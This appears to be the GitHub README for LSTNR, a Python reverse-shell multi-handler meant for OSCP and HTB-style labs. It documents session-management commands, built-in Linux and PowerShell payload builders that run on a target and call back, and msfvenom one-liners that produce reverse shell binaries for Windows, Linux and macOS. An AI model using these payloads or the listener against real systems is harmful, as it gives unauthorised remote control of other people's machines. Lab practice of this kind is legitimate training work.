LSTNR

Python script that receives reverse shell connections from remote devices. Multi-Handler.

Remote devices can be managed from a Command Line Interface (CLI).

FYI: Using rlwrap will allow your CLI history remain intact while working.

DISCLAIMER

This is only for testing purposes, not intended for anything illegal. I was testing out ways to manage multiple connections while doing the OSCP, HTB and THM labs. #Hobbies

Download LSTNR

git clone github.com/bwithe/LSNTR

cd lstnr

USAGE

1. Start LSTNR
   • python3 lstnr.py -p <PORT_TO_LISTEN>

• MENU COMMANDS
  • help or ? : Displays info and usage on all commands
  • ls : lists connected clients
  • cs <ID> : connects to that session
  • payload linux -lhost <IP> -lport <PORT : Builds a rev.sh locally to copy to TGT
  • payload windows -lhost <IP> -lport <PORT : Builds a rev.ps1 locally to copy to TGT
  • die : Will terminate all sessions
  • exit : will terminate all sessions and stop the script
• SESSION COMMANDS
  • hostname : updates session table information
  • whoami: updates session table information
  • stable : upgrades TTY shell
  • payload windows : creates a rev.ps1 on tgt, and then executes it calling back to LSTNR
  • payload linux : creates a rev.sh on tgt, and then executes it calling back to LSTNR
  • CTRL+C or bs : backgrounds the active session
  • die : while in a session will terminate it

2. Have CLIENT connect to LSTNR
   • LSTNR has built in revshells, but depending on your situation, please see the following.
   • MSFVENOM
     • Best options that work with lstnr.py
       • Windows: msfvenom -p windows/x64/powershell_reverse_tcp LHOST=127.0.0.1 LPORT=21 -f exe -o rev.exe
       • Windows: msfvenom -p windows/x64/powershell_reverse_tcp LHOST=127.0.0.1 LPORT=21 -f dll -o rev.dll
       • Linux: msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=21 -f elf -o rev.elf
       • MacOS: msfvenom -p osx/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=21 -f macho -o rev.macho
   • https://www.revshells.com (recommended)
     • Windows: Powershell #3 (Base64)
     • Linux: Bash -i
     • MacOS: python3

Screenshot examples:

• Starting the listener python3 lstnr.py -p <port>

• To get a list of commands, type ? or help

• List any active sessions with ls

• When a session is established, ls will always verify

• To build reverse shells for Windows PowerShell

payload windows -lhost <IP> -lport <PORT>

• To build reverse shells for Linux /bin/sh

payload linux -lhost <IP> -lport <PORT>

• Connecting to a session with cs <id>
• To update the sessions table, run whoami and hostname
• When you background the session it will show the updated session table

• Upgrade your shell with stable

• Building a new session "revshell" with payload linux

• Building a new session "revshell" with payload windows

• Background a session with bs or CTRL+C

• To see updated session information, type ls

• Example of a Windows machine connected

• Kill an individual session die

• To kill all sessions, type die at the main menu lstnr$

• To kill LSTNR$ and all connections, type exit

• LSTNR WILL NOT CLOSE WITH CTRL+C

• LSTNR also keeps a session and command log

TROUBLESHOOTING

• If a session hangs, background the session with CTRL+C and then reconnect.
• Sometimes the whoami and hostname commannd will hang, just background it and reconnect cs <id> and try running it again.
  • If commands stop working all together, reconnect to the session and run die, then re-run the reverse shell from the client machine.
• If you are having issues please feel free to reach out